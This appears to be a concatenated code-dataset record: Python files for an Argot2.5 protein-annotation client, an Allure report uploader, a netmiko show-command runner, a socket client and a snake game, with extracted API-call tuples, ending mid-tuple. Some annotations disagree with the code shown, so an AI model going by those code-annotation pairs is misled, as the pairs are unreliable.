r_batch = s.post("http://www.medcomp.medicina.unipd.it/Argot2-5/form_batch.php",headers=headers)
#r_batch = s.post("http://localhost/test/upload.php",headers=headers,data=payload,files=files)
r_insert = s.post(argot_url,data=payload,files=files,headers=headers)
with open(html_file,"w") as outfile:
outfile.writelines(r_insert.text)
def download_argot2(config):
workdir = config["input"]["gomap_dir"] + "/"
argot_config=config["data"]["mixed-method"]["argot2"]
html_dir=workdir+argot_config["preprocess"]["html"]+"/"
result_dir=workdir+argot_config["result_dir"]+"/"
argot_files = glob(html_dir+"*html")
for argot_file in argot_files:
result_file = result_dir+re.sub(".insert.html",".tsv",os.path.basename(argot_file))
if os.path.isfile(result_file):
logging.info("The result file already exists.")
logging.info("Delete "+result_file+" if you want to redownload it" )
else:
logging.info("Downloading results for " +os.path.basename(result_file) + " from Argot2.5 webservice")
tree = html.parse(argot_file)
all_links = tree.findall(".//a")
link_href = [ link.attrib["href"] for link in all_links if "getStatus_batch.php" in link.attrib["href"] ][0]
res_link = re.sub("getStatus_batch.php","viewResults_batch.php",link_href)
r = requests.get(res_link)
res_tree = html.fromstring(r.text)
all_links = res_tree.findall(".//a")
csv_href = argot_config["baseurl"]+"/"+[ link.attrib["href"] for link in all_links if "getTSVFile.php" in link.attrib["href"] ][0]
csv_r = requests.get(csv_href)
with open(result_file+".zip","w") as outfile:
outfile.write(csv_r.content)
# r = requests.get(csv_href)
# with open("")
def process_argot2(config):
workdir = config["input"]["gomap_dir"] + "/"
result_dir = workdir + config["data"]["mixed-method"]["argot2"]["result_dir"]
zipfiles=glob(result_dir+"/*zip")
for result_zip in zipfiles:
outfile=re.sub(r".zip","",result_zip)
if not os.path.isfile(outfile):
logging.info("Unzipping " + os.path.basename(result_zip))
archive = zipfile.ZipFile(result_zip)
result_file="argot_results_ts0.tsv"
archive.extract(result_file,workdir)
shutil.move(workdir+"/"+result_file, outfile)
else:
logging.info("Outfile " + outfile + " already exists.\n Please deltreeit to regenerate")
|
[
"os.remove",
"Bio.SeqIO.write",
"os.path.isfile",
"glob.glob",
"lxml.html.parse",
"os.path.exists",
"lxml.html.fromstring",
"requests.get",
"lxml.etree.parse",
"re.sub",
"requests.session",
"Bio.SeqIO.parse",
"os.path.basename",
"lxml.etree.XSLT",
"code.utils.basic_utils.check_output_and_run",
"re.match",
"zipfile.ZipFile",
"logging.info",
"shutil.move",
"joblib.Parallel",
"joblib.delayed"
] |
[((394, 423), 're.sub', 're.sub', (['"""xml$"""', '"""tsv"""', 'in_xml'], {}), "('xml$', 'tsv', in_xml)\n", (400, 423), False, 'import logging, os, re, sys, shutil\n'), ((4554, 4578), 'glob.glob', 'glob', (["(hmmer_dir + '/*fa')"], {}), "(hmmer_dir + '/*fa')\n", (4558, 4578), False, 'from glob import glob\n'), ((8155, 8179), 'glob.glob', 'glob', (["(html_dir + '*html')"], {}), "(html_dir + '*html')\n", (8159, 8179), False, 'from glob import glob\n'), ((9566, 9592), 'glob.glob', 'glob', (["(result_dir + '/*zip')"], {}), "(result_dir + '/*zip')\n", (9570, 9592), False, 'from glob import glob\n'), ((434, 457), 'os.path.exists', 'os.path.exists', (['out_tsv'], {}), '(out_tsv)\n', (448, 457), False, 'import logging, os, re, sys, shutil\n'), ((467, 525), 'logging.info', 'logging.info', (["('Converting %s into %s.' % (in_xml, out_tsv))"], {}), "('Converting %s into %s.' % (in_xml, out_tsv))\n", (479, 525), False, 'import logging, os, re, sys, shutil\n'), ((545, 583), 'lxml.etree.parse', 'etree.parse', (['"""config/bl_xml2argot.xsl"""'], {}), "('config/bl_xml2argot.xsl')\n", (556, 583), False, 'from lxml import etree, html\n'), ((604, 625), 'lxml.etree.XSLT', 'etree.XSLT', (['xslt_root'], {}), '(xslt_root)\n', (614, 625), False, 'from lxml import etree, html\n'), ((644, 663), 'lxml.etree.parse', 'etree.parse', (['in_xml'], {}), '(in_xml)\n', (655, 663), False, 'from lxml import etree, html\n'), ((949, 1034), 'logging.info', 'logging.info', (["('Not converting %s into %s. Output file exists' % (in_xml, out_tsv))"], {}), "('Not converting %s into %s. Output file exists' % (in_xml,\n out_tsv))\n", (961, 1034), False, 'import logging, os, re, sys, shutil\n'), ((1613, 1640), 'glob.glob', 'glob', (["(tmp_bl_dir + '/*.xml')"], {}), "(tmp_bl_dir + '/*.xml')\n", (1617, 1640), False, 'from glob import glob\n'), ((1645, 1667), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': 'ncpus'}), '(n_jobs=ncpus)\n', (1653, 1667), False, 'from joblib import Parallel, delayed\n'), ((2039, 2055), 'glob.glob', 'glob', (['fa_pattern'], {}), '(fa_pattern)\n', (2043, 2055), False, 'from glob import glob\n'), ((3019, 3046), 'os.path.isfile', 'os.path.isfile', (['zipfile_loc'], {}), '(zipfile_loc)\n', (3033, 3046), False, 'import logging, os, re, sys, shutil\n'), ((3464, 3485), 'glob.glob', 'glob', (["(fa_dir + '/*fa')"], {}), "(fa_dir + '/*fa')\n", (3468, 3485), False, 'from glob import glob\n'), ((4623, 4658), 're.sub', 're.sub', (['"""\\\\.fa"""', '""".hmm.out"""', 'infile'], {}), "('\\\\.fa', '.hmm.out', infile)\n", (4629, 4658), False, 'import logging, os, re, sys, shutil\n'), ((4787, 4825), 'code.utils.basic_utils.check_output_and_run', 'check_output_and_run', (['zipfile_loc', 'cmd'], {}), '(zipfile_loc, cmd)\n', (4807, 4825), False, 'from code.utils.basic_utils import check_output_and_run\n'), ((4836, 4859), 'os.path.exists', 'os.path.exists', (['outfile'], {}), '(outfile)\n', (4850, 4859), False, 'import logging, os, re, sys, shutil\n'), ((5000, 5024), 'os.path.isfile', 'os.path.isfile', (['tmp_file'], {}), '(tmp_file)\n', (5014, 5024), False, 'import logging, os, re, sys, shutil\n'), ((7034, 7059), 'os.path.isfile', 'os.path.isfile', (['html_file'], {}), '(html_file)\n', (7048, 7059), False, 'import logging, os, re, sys, shutil\n'), ((8316, 8343), 'os.path.isfile', 'os.path.isfile', (['result_file'], {}), '(result_file)\n', (8330, 8343), False, 'import logging, os, re, sys, shutil\n'), ((9639, 9669), 're.sub', 're.sub', (['""".zip"""', '""""""', 'result_zip'], {}), "('.zip', '', result_zip)\n", (9645, 9669), False, 'import logging, os, re, sys, shutil\n'), ((2224, 2253), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fa_file', '"""fasta"""'], {}), "(fa_file, 'fasta')\n", (2235, 2253), False, 'from Bio import SeqIO\n'), ((3060, 3151), 'logging.info', 'logging.info', (["(zipfile_loc + ' already exists. Please delete if you need this recreated')"], {}), "(zipfile_loc +\n ' already exists. Please delete if you need this recreated')\n", (3072, 3151), False, 'import logging, os, re, sys, shutil\n'), ((3178, 3250), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zipfile_loc'], {'mode': '"""w"""', 'compression': 'zipfile.ZIP_DEFLATED'}), "(zipfile_loc, mode='w', compression=zipfile.ZIP_DEFLATED)\n", (3193, 3250), False, 'import zipfile\n'), ((3935, 3964), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fa_file', '"""fasta"""'], {}), "(fa_file, 'fasta')\n", (3946, 3964), False, 'from Bio import SeqIO\n'), ((4356, 4394), 'Bio.SeqIO.write', 'SeqIO.write', (['all_seqs', 'out_fa', '"""fasta"""'], {}), "(all_seqs, out_fa, 'fasta')\n", (4367, 4394), False, 'from Bio import SeqIO\n'), ((4878, 4933), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zipfile_loc', '"""w"""', 'zipfile.ZIP_DEFLATED'], {}), "(zipfile_loc, 'w', zipfile.ZIP_DEFLATED)\n", (4893, 4933), False, 'import zipfile\n'), ((5038, 5057), 'os.remove', 'os.remove', (['tmp_file'], {}), '(tmp_file)\n', (5047, 5057), False, 'import logging, os, re, sys, shutil\n'), ((5497, 5522), 'os.path.basename', 'os.path.basename', (['fa_file'], {}), '(fa_file)\n', (5513, 5522), False, 'import logging, os, re, sys, shutil\n'), ((5539, 5556), 'glob.glob', 'glob', (['tsv_pattern'], {}), '(tsv_pattern)\n', (5543, 5556), False, 'from glob import glob\n'), ((5608, 5654), 'glob.glob', 'glob', (["(argot2_blast_dir + tsv_file + '*tsv.zip')"], {}), "(argot2_blast_dir + tsv_file + '*tsv.zip')\n", (5612, 5654), False, 'from glob import glob\n'), ((5673, 5719), 'glob.glob', 'glob', (["(argot2_hmmer_dir + tsv_file + '*out.zip')"], {}), "(argot2_hmmer_dir + tsv_file + '*out.zip')\n", (5677, 5719), False, 'from glob import glob\n'), ((7073, 7128), 'logging.info', 'logging.info', (['"""This file has been previously submitted"""'], {}), "('This file has been previously submitted')\n", (7085, 7128), False, 'import logging, os, re, sys, shutil\n'), ((7141, 7193), 'logging.info', 'logging.info', (["('Remove ' + html_file + ' to resubmit')"], {}), "('Remove ' + html_file + ' to resubmit')\n", (7153, 7193), False, 'import logging, os, re, sys, shutil\n'), ((7460, 7478), 'requests.session', 'requests.session', ([], {}), '()\n', (7476, 7478), False, 'import requests\n'), ((8357, 8404), 'logging.info', 'logging.info', (['"""The result file already exists."""'], {}), "('The result file already exists.')\n", (8369, 8404), False, 'import logging, os, re, sys, shutil\n'), ((8417, 8488), 'logging.info', 'logging.info', (["('Delete ' + result_file + ' if you want to redownload it')"], {}), "('Delete ' + result_file + ' if you want to redownload it')\n", (8429, 8488), False, 'import logging, os, re, sys, shutil\n'), ((8633, 8655), 'lxml.html.parse', 'html.parse', (['argot_file'], {}), '(argot_file)\n', (8643, 8655), False, 'from lxml import etree, html\n'), ((8845, 8910), 're.sub', 're.sub', (['"""getStatus_batch.php"""', '"""viewResults_batch.php"""', 'link_href'], {}), "('getStatus_batch.php', 'viewResults_batch.php', link_href)\n", (8851, 8910), False, 'import logging, os, re, sys, shutil\n'), ((8925, 8947), 'requests.get', 'requests.get', (['res_link'], {}), '(res_link)\n', (8937, 8947), False, 'import requests\n'), ((8971, 8994), 'lxml.html.fromstring', 'html.fromstring', (['r.text'], {}), '(r.text)\n', (8986, 8994), False, 'from lxml import etree, html\n'), ((9208, 9230), 'requests.get', 'requests.get', (['csv_href'], {}), '(csv_href)\n', (9220, 9230), False, 'import requests\n'), ((9684, 9707), 'os.path.isfile', 'os.path.isfile', (['outfile'], {}), '(outfile)\n', (9698, 9707), False, 'import logging, os, re, sys, shutil\n'), ((9801, 9828), 'zipfile.ZipFile', 'zipfile.ZipFile', (['result_zip'], {}), '(result_zip)\n', (9816, 9828), False, 'import zipfile\n'), ((9938, 9987), 'shutil.move', 'shutil.move', (["(workdir + '/' + result_file)", 'outfile'], {}), "(workdir + '/' + result_file, outfile)\n", (9949, 9987), False, 'import logging, os, re, sys, shutil\n'), ((10010, 10105), 'logging.info', 'logging.info', (['(\'Outfile \' + outfile + """ already exists.\n Please delete it to regenerate""")'], {}), '(\'Outfile \' + outfile +\n """ already exists.\n Please delete it to regenerate""")\n', (10022, 10105), False, 'import logging, os, re, sys, shutil\n'), ((756, 785), 're.match', 're.match', (['"""[0-9A-Za-z]"""', 'line'], {}), "('[0-9A-Za-z]', line)\n", (764, 785), False, 'import logging, os, re, sys, shutil\n'), ((1668, 1684), 'joblib.delayed', 'delayed', (['xml2tsv'], {}), '(xml2tsv)\n', (1675, 1684), False, 'from joblib import Parallel, delayed\n'), ((2405, 2432), 're.sub', 're.sub', (['"""\\\\.fa$"""', '""".tsv"""', 'x'], {}), "('\\\\.fa$', '.tsv', x)\n", (2411, 2432), False, 'import logging, os, re, sys, shutil\n'), ((3279, 3304), 'os.path.basename', 'os.path.basename', (['tsv_out'], {}), '(tsv_out)\n', (3295, 3304), False, 'import logging, os, re, sys, shutil\n'), ((4962, 4987), 'os.path.basename', 'os.path.basename', (['outfile'], {}), '(outfile)\n', (4978, 4987), False, 'import logging, os, re, sys, shutil\n'), ((8275, 8303), 'os.path.basename', 'os.path.basename', (['argot_file'], {}), '(argot_file)\n', (8291, 8303), False, 'import logging, os, re, sys, shutil\n'), ((2627, 2654), 're.sub', 're.sub', (['"""\\\\.fa$"""', '""".tsv"""', 'x'], {}), "('\\\\.fa$', '.tsv', x)\n", (2633, 2654), False, 'import logging, os, re, sys, shutil\n'), ((9749, 9777), 'os.path.basename', 'os.path.basename', (['result_zip'], {}), '(result_zip)\n', (9765, 9777), False, 'import logging, os, re, sys, shutil\n'), ((7268, 7296), 'os.path.basename', 'os.path.basename', (['blast_file'], {}), '(blast_file)\n', (7284, 7296), False, 'import logging, os, re, sys, shutil\n'), ((7297, 7325), 'os.path.basename', 'os.path.basename', (['hmmer_file'], {}), '(hmmer_file)\n', (7313, 7325), False, 'import logging, os, re, sys, shutil\n'), ((7384, 7412), 'os.path.basename', 'os.path.basename', (['blast_file'], {}), '(blast_file)\n', (7400, 7412), False, 'import logging, os, re, sys, shutil\n'), ((7413, 7441), 'os.path.basename', 'os.path.basename', (['hmmer_file'], {}), '(hmmer_file)\n', (7429, 7441), False, 'import logging, os, re, sys, shutil\n'), ((8553, 8582), 'os.path.basename', 'os.path.basename', (['result_file'], {}), '(result_file)\n', (8569, 8582), False, 'import logging, os, re, sys, shutil\n')]
|
import time
import logging
import os
import requests
import base64
logger = logging.getLogger()
def pytest_addoption(parser):
"""
Parse pytest options
    :param parser: pytest builtin
"""
parser.addoption('--allure_server_addr', action='store', default=None, help='Allure server address: IP/domain name')
parser.addoption('--allure_server_port', action='store', default=5050, help='Allure server port')
parser.addoption('--allure_server_project_id', action='store', default=None, help='Allure server project ID')
def pytest_sessionfinish(session, exitstatus):
"""
    Pytest hook which is executed after all tests, before exiting the program
    :param session: pytest builtin
    :param exitstatus: pytest builtin
"""
if not session.config.getoption("--collectonly"):
allure_server_addr = session.config.option.allure_server_addr
allure_server_port = session.config.option.allure_server_port
allure_server_project_id = session.config.option.allure_server_project_id
if allure_server_addr:
allure_report_dir = session.config.option.allure_report_dir
if allure_report_dir:
try:
allure_server_odb = AllureServer(allure_server_addr, allure_server_port, allure_report_dir,
allure_server_project_id)
allure_server_odb.generate_allure_report()
except Exception as err:
logger.error('Failed to upload allure report to server. Allure report not available. '
'\nError: {}'.format(err))
else:
logger.error('PyTest argument "--alluredir" not provided. Impossible to generate Allure report')
def get_time_stamp_str():
"""
    This method returns a string with the current time
:return: string, example: 16063138520755782
"""
current_time = time.time()
current_time_without_dot = str(current_time).replace('.', '')
return current_time_without_dot
class AllureServer:
def __init__(self, allure_server_ip, allure_server_port, allure_report_dir, project_id=None):
self.allure_report_dir = allure_report_dir
self.base_url = 'http://{}:{}/allure-docker-service'.format(allure_server_ip, allure_server_port)
self.project_id = project_id if project_id else get_time_stamp_str()
self.http_headers = {'Content-type': 'application/json'}
def generate_allure_report(self):
"""
        This method creates a new project (if needed) on the allure server, uploads test results to the server, and generates the report
"""
self.create_project_on_allure_server()
self.upload_results_to_allure_server()
self.generate_report_on_allure_server()
def create_project_on_allure_server(self):
"""
        This method creates a new project (if needed) on the allure server
"""
data = {'id': self.project_id}
url = self.base_url + '/projects'
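        # Only create the project if it does not already exist on the server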
if requests.get(url + '/' + self.project_id).status_code != 200:
logger.info('Creating project {} on allure server'.format(self.project_id))
response = requests.post(url, json=data, headers=self.http_headers)
if response.raise_for_status():
logger.error('Failed to create project on allure server, error: {}'.format(response.content))
else:
logger.info('Allure project {} already exist on server. No need to create project'.format(self.project_id))
def upload_results_to_allure_server(self):
"""
        This method uploads files from the allure results folder to the allure server
"""
data = {'results': self.get_allure_files_content()}
url = self.base_url + '/send-results?project_id=' + self.project_id
logger.info('Sending allure results to allure server')
response = requests.post(url, json=data, headers=self.http_headers)
if response.raise_for_status():
logger.error('Failed to upload results to allure server, error: {}'.format(response.content))
def get_allure_files_content(self):
"""
        This method creates a list of all files under the allure report folder
:return: list with allure folder content, example [{'file1': 'file content'}, {'file2': 'file2 content'}]
"""
files = os.listdir(self.allure_report_dir)
results = []
for file in files:
result = {}
file_path = self.allure_report_dir + "/" + file
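            # Read each file and base64-encode its content for the JSON payload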
if os.path.isfile(file_path):
try:
with open(file_path, "rb") as f:
content = f.read()
if content.strip():
b64_content = base64.b64encode(content)
result['file_name'] = file
result['content_base64'] = b64_content.decode('UTF-8')
results.append(result)
finally:
f.close()
return results
def generate_report_on_allure_server(self):
"""
This method would generate the report on the remote allure server and display the report URL in the log
"""
logger.info('Generating report on allure server')
url = self.base_url + '/generate-report?project_id=' + self.project_id
response = requests.get(url, headers=self.http_headers)
if response.raise_for_status():
logger.error('Failed to generate report on allure server, error: {}'.format(response.content))
else:
report_url = response.json()['data']['report_url']
logger.info('Allure report URL: {}'.format(report_url))
|
[
"time.time",
"os.path.isfile",
"base64.b64encode",
"requests.get",
"requests.post",
"os.listdir",
"logging.getLogger"
] |
[((77, 96), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (94, 96), False, 'import logging\n'), ((1943, 1954), 'time.time', 'time.time', ([], {}), '()\n', (1952, 1954), False, 'import time\n'), ((3918, 3974), 'requests.post', 'requests.post', (['url'], {'json': 'data', 'headers': 'self.http_headers'}), '(url, json=data, headers=self.http_headers)\n', (3931, 3974), False, 'import requests\n'), ((4388, 4422), 'os.listdir', 'os.listdir', (['self.allure_report_dir'], {}), '(self.allure_report_dir)\n', (4398, 4422), False, 'import os\n'), ((5435, 5479), 'requests.get', 'requests.get', (['url'], {'headers': 'self.http_headers'}), '(url, headers=self.http_headers)\n', (5447, 5479), False, 'import requests\n'), ((3204, 3260), 'requests.post', 'requests.post', (['url'], {'json': 'data', 'headers': 'self.http_headers'}), '(url, json=data, headers=self.http_headers)\n', (3217, 3260), False, 'import requests\n'), ((4571, 4596), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (4585, 4596), False, 'import os\n'), ((3031, 3072), 'requests.get', 'requests.get', (["(url + '/' + self.project_id)"], {}), "(url + '/' + self.project_id)\n", (3043, 3072), False, 'import requests\n'), ((4801, 4826), 'base64.b64encode', 'base64.b64encode', (['content'], {}), '(content)\n', (4817, 4826), False, 'import base64\n')]
|
from concurrent.futures import ThreadPoolExecutor
import re
from pprint import pprint
from itertools import repeat
import logging
import netmiko
import paramiko
import yaml
logging.getLogger("paramiko").setLevel(logging.WARNING)
logging.getLogger("netmiko").setLevel(logging.WARNING)
logging.basicConfig(
format="%(threadName)s %(name)s %(levelname)s: %(message)s", level=logging.INFO
)
def send_show_command(device, show):
host = device["host"]
logging.info(f">>> Connecting to {host}")
try:
with netmiko.Netmiko(**device) as ssh:
ssh.enable()
output = ssh.send_command(show)
logging.debug(f"\n{output}\n")
logging.info(f"<<< Received output from {host}")
return output
    except netmiko.NetmikoTimeoutException as error:
        logging.info(f"Failed to connect to {host}: {error}")
except paramiko.ssh_exception.AuthenticationException:
logging.info(f"Authentication error on {host}")
def send_show_to_devices(devices, show, max_threads=10):
result_dict = {}
with ThreadPoolExecutor(max_workers=max_threads) as executor:
results = executor.map(send_show_command, devices, repeat(show))
for dev, output in zip(devices, results):
result_dict[dev["host"]] = output
return result_dict
if __name__ == "__main__":
with open("devices.yaml") as f:
devices = yaml.safe_load(f)
r = send_show_to_devices(devices, "sh int desc")
pprint(r, width=120)
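# Hedged note: devices.yaml must hold a list of netmiko connection dicts,
# because each entry is unpacked as Netmiko(**device). A plausible layout
# (values are placeholders, not taken from the source):
#
#   - device_type: cisco_ios
#     host: 192.168.100.1
#     username: cisco
#     password: cisco
#     secret: cisco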
|
[
"netmiko.Netmiko",
"itertools.repeat",
"logging.debug",
"logging.basicConfig",
"logging.info",
"yaml.safe_load",
"pprint.pprint",
"concurrent.futures.ThreadPoolExecutor",
"logging.getLogger"
] |
[((288, 393), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(threadName)s %(name)s %(levelname)s: %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(threadName)s %(name)s %(levelname)s: %(message)s', level=logging.INFO)\n", (307, 393), False, 'import logging\n'), ((464, 505), 'logging.info', 'logging.info', (['f""">>> Connecting to {host}"""'], {}), "(f'>>> Connecting to {host}')\n", (476, 505), False, 'import logging\n'), ((1478, 1498), 'pprint.pprint', 'pprint', (['r'], {'width': '(120)'}), '(r, width=120)\n', (1484, 1498), False, 'from pprint import pprint\n'), ((176, 205), 'logging.getLogger', 'logging.getLogger', (['"""paramiko"""'], {}), "('paramiko')\n", (193, 205), False, 'import logging\n'), ((232, 260), 'logging.getLogger', 'logging.getLogger', (['"""netmiko"""'], {}), "('netmiko')\n", (249, 260), False, 'import logging\n'), ((1071, 1114), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {'max_workers': 'max_threads'}), '(max_workers=max_threads)\n', (1089, 1114), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((1403, 1420), 'yaml.safe_load', 'yaml.safe_load', (['f'], {}), '(f)\n', (1417, 1420), False, 'import yaml\n'), ((528, 553), 'netmiko.Netmiko', 'netmiko.Netmiko', ([], {}), '(**device)\n', (543, 553), False, 'import netmiko\n'), ((643, 673), 'logging.debug', 'logging.debug', (['f"""\n{output}\n"""'], {}), "(f'\\n{output}\\n')\n", (656, 673), False, 'import logging\n'), ((686, 734), 'logging.info', 'logging.info', (['f"""<<< Received output from {host}"""'], {}), "(f'<<< Received output from {host}')\n", (698, 734), False, 'import logging\n'), ((822, 866), 'logging.info', 'logging.info', (['f"""Failed to connect to {host}"""'], {}), "(f'Failed to connect to {host}')\n", (834, 866), False, 'import logging\n'), ((934, 981), 'logging.info', 'logging.info', (['f"""Authentication error on {host}"""'], {}), "(f'Authentication error on {host}')\n", (946, 981), False, 'import logging\n'), ((1187, 1199), 'itertools.repeat', 'repeat', (['show'], {}), '(show)\n', (1193, 1199), False, 'from itertools import repeat\n')]
|
import socket
s = socket.socket()                 # defaults to a TCP (AF_INET, SOCK_STREAM) socket
s.connect(('192.168.2.10', 1234))
data = s.recv(1024)                 # returns at most 1024 bytes per call
s.close()
print('Received', data)
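# For context, a minimal server-side sketch this client could talk to
# (kept as a comment so the client script above is unchanged; the bind
# address and payload are assumptions, only the port matches):
#
#   import socket
#   srv = socket.socket()
#   srv.bind(('0.0.0.0', 1234))
#   srv.listen(1)
#   conn, addr = srv.accept()     # blocks until a client connects
#   conn.send(b'hello client')    # what the client's recv(1024) returns
#   conn.close()
#   srv.close()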
|
[
"socket.socket"
] |
[((19, 34), 'socket.socket', 'socket.socket', ([], {}), '()\n', (32, 34), False, 'import socket\n')]
|
from __future__ import print_function
import os
osName = os.name
clearCommand = 'cls' if osName == 'nt' else 'clear'
if osName == "nt":
import msvcrt
import colorama
colorama.init()
else:
import sys
import select
import tty
import termios
import threading
import time
import random
import maps
# Clear the screen (works on both windows and linux)
def clear():
os.system(clearCommand)
# The INITIAL map - this is converted into a gameMapList list at the start
# Do NOT edit this during the game execution, edit gameMapList instead
gameMap = """
############################################################
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
############################################################
"""
# Scan the maps.py file
def fetch_maps():
running = True
count = 1
output = ["0) Default"]
while running:
try:
output.append(f"{count}) " + getattr(maps, f"map{count}")[0])
count += 1
except AttributeError:
running = False
return output
# Get the user's input to choose a map
print(*fetch_maps(), sep="\n")
maps_prompt_input = input("> ")
# Select the map according to the user's input
if maps_prompt_input.strip() != "0" and maps_prompt_input.strip() != "":
gameMap = getattr(maps, f"map{maps_prompt_input}")[1]
mapX = len(gameMap.split("\n")[1]) # Get the length of the map
mapY = len(gameMap.split("\n")) - 2 # Get the height of the map
# Convert gameMap to a list so it can be manipulated
gameMapList = list(gameMap)
# Clear the screen and print the stuff contained in gameMapList
def update_map():
global gameMap
gameMap = ''.join(gameMapList)
clear()
print(gameMap)
# Change an element in the list gameMapList at (x, y) -> index
# Note that this doesn't call the update_map() function
def change_char_at(char, x, y):
global gameMapList
global mapX
gameMapList[(mapX * (y - 1) + x) + y - 1] = char
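    # Index derivation: gameMap starts with a leading newline and each row
    # is mapX characters plus its trailing '\n', so row y begins at
    # (y - 1) * (mapX + 1) + 1; adding the 1-based column x yields
    # (mapX * (y - 1) + x) + (y - 1), the expression used above.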
# This is executed in a thread to get the user's input
# without stopping the program
def unix_input_key_pressed():
return select.select([sys.stdin], [], [], 0) == ([sys.stdin], [], [])
def unix_input_read_key():
return sys.stdin.read(1)
def unix_input_restore_settings():
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)
if osName != "nt":
old_settings = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin.fileno())
def input_listener():
global currentInput
while True:
if osName == 'nt':
currentInput = msvcrt.getch().decode("utf-8").lower()
elif unix_input_key_pressed():
currentInput = unix_input_read_key().lower()
# The snake/player class
class Snake:
def __init__(self, x, y, head, body):
self.going = "d"
self.x = x
self.y = y
self.positions = []
self.eatenApples = 1
self.dead = False
self.head = head
self.body = body
self.loopCount = 0
def die(self):
self.dead = True
print("\u001b[31mYOU DIED\u001b[0m")
if osName != "nt":
unix_input_restore_settings()
input()
exit()
# Main method
def update(self):
def change_dir():
global currentInput
if currentInput == "d":
if self.going != "a":
self.going = "d"
self.x += 1
else:
currentInput = self.going
self.x -= 1
elif currentInput == "a":
if self.going != "d":
self.going = "a"
self.x -= 1
else:
currentInput = self.going
self.x += 1
elif currentInput == "w":
if self.going != "s":
self.going = "w"
self.y -= 1
else:
currentInput = self.going
self.y += 1
elif currentInput == "s":
if self.going != "w":
self.going = "s"
self.y += 1
else:
currentInput = self.going
self.y -= 1
else:
currentInput = self.going
change_dir()
if self.x == 1 or self.x == mapX or self.y == 1 or self.y == mapY or (self.x, self.y) in self.positions:
self.die()
self.positions.append((self.x, self.y))
        if len(self.positions) > self.eatenApples:
self.positions.pop(0)
if self.x == apple.x and self.y == apple.y:
self.eatenApples += 1
apple.eaten = True
if not self.dead:
change_dir()
self.render()
##################################################
# Update gameMapList so, later, it can be displayed
def render(self):
for n, i in enumerate(gameMapList):
if i == self.body:
gameMapList[n] = " "
for i in self.positions:
change_char_at(self.body, i[0], i[1])
change_char_at(self.head, self.x, self.y)
# The apple class
class Apple:
def __init__(self, char):
self.char = char
self.x = 1
self.y = 1
self.eaten = True
def spawn(self):
if self.eaten:
self.x = random.randint(2, mapX - 1)
self.y = random.randint(2, mapY - 1)
if (self.x, self.y) not in snake.positions:
change_char_at(self.char, self.x, self.y)
self.eaten = False
else:
# print("ahah found")
self.spawn() # I know, I know, I shouldn't be doing this lol
# Get the user's input without stopping the program
currentInput = "d"
inputListener = threading.Thread(target=input_listener)
inputListener.daemon = True
inputListener.start()
# Game objects
GapBetweenFrames = 0.15
snake = Snake(4, 10, "\u001b[32m@\u001b[0m", "\u001b[32mo\u001b[0m")
apple = Apple("\u001b[31mX\u001b[0m")
# Start the game
clear()
print("Move with \u001b[36mWASD\u001b[0m")
print(4)
time.sleep(1)
print(3)
time.sleep(1)
print(2)
time.sleep(1)
print(1)
time.sleep(1)
previous_time = time.time()
dt = 0
# Game loop
while not snake.dead:
time.sleep(GapBetweenFrames)
snake.update()
apple.spawn()
update_map()
print(f"Score: {snake.eatenApples - 1}")
dt = time.time() - previous_time
previous_time = time.time()
# Debug
print(f"Delta time: {dt}")
|
[
"colorama.init",
"threading.Thread",
"sys.stdin.read",
"random.randint",
"termios.tcgetattr",
"msvcrt.getch",
"os.system",
"time.time",
"time.sleep",
"termios.tcsetattr",
"select.select",
"sys.stdin.fileno"
] |
[((7164, 7203), 'threading.Thread', 'threading.Thread', ([], {'target': 'input_listener'}), '(target=input_listener)\n', (7180, 7203), False, 'import threading\n'), ((7492, 7505), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7502, 7505), False, 'import time\n'), ((7517, 7530), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7527, 7530), False, 'import time\n'), ((7542, 7555), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7552, 7555), False, 'import time\n'), ((7567, 7580), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7577, 7580), False, 'import time\n'), ((7600, 7611), 'time.time', 'time.time', ([], {}), '()\n', (7609, 7611), False, 'import time\n'), ((187, 202), 'colorama.init', 'colorama.init', ([], {}), '()\n', (200, 202), False, 'import colorama\n'), ((417, 440), 'os.system', 'os.system', (['clearCommand'], {}), '(clearCommand)\n', (426, 440), False, 'import os\n'), ((3360, 3377), 'sys.stdin.read', 'sys.stdin.read', (['(1)'], {}), '(1)\n', (3374, 3377), False, 'import sys\n'), ((3423, 3484), 'termios.tcsetattr', 'termios.tcsetattr', (['sys.stdin', 'termios.TCSADRAIN', 'old_settings'], {}), '(sys.stdin, termios.TCSADRAIN, old_settings)\n', (3440, 3484), False, 'import termios\n'), ((3529, 3557), 'termios.tcgetattr', 'termios.tcgetattr', (['sys.stdin'], {}), '(sys.stdin)\n', (3546, 3557), False, 'import termios\n'), ((7661, 7689), 'time.sleep', 'time.sleep', (['GapBetweenFrames'], {}), '(GapBetweenFrames)\n', (7671, 7689), False, 'import time\n'), ((7856, 7867), 'time.time', 'time.time', ([], {}), '()\n', (7865, 7867), False, 'import time\n'), ((3253, 3290), 'select.select', 'select.select', (['[sys.stdin]', '[]', '[]', '(0)'], {}), '([sys.stdin], [], [], 0)\n', (3266, 3290), False, 'import select\n'), ((3579, 3597), 'sys.stdin.fileno', 'sys.stdin.fileno', ([], {}), '()\n', (3595, 3597), False, 'import sys\n'), ((7807, 7818), 'time.time', 'time.time', ([], {}), '()\n', (7816, 7818), False, 'import time\n'), ((6701, 6728), 'random.randint', 'random.randint', (['(2)', '(mapX - 1)'], {}), '(2, mapX - 1)\n', (6715, 6728), False, 'import random\n'), ((6751, 6778), 'random.randint', 'random.randint', (['(2)', '(mapY - 1)'], {}), '(2, mapY - 1)\n', (6765, 6778), False, 'import random\n'), ((3724, 3738), 